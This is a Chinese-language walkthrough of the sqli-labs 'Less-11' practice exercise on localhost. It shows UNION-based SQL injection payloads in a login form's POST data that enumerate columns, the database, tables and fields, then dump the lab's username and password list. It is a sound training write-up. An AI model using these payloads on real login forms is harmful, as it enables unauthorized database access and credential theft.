http://127.0.0.1/sqli/Less-11/

 

 

 看到这个页面,添个admin,admin在说.

 

 

 什么情况,竟然出现这个结果.那么在乱填一个.

 

 

 

 

 

 明显不一样了.那么我还是抓包处理一下.

抓到包,我们可以尝试重发测试.

 

 

 看到数据库报错,第一个时间想到这点有漏洞.

 

 

uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit　　#得知有2列数

uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit　　#得到数据库security

uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit　　#得到数据表emails,referers,uagents,users

uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit　　#得到数据表users的字段

user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password

uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit　　#数据表users的username和password的数据

Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4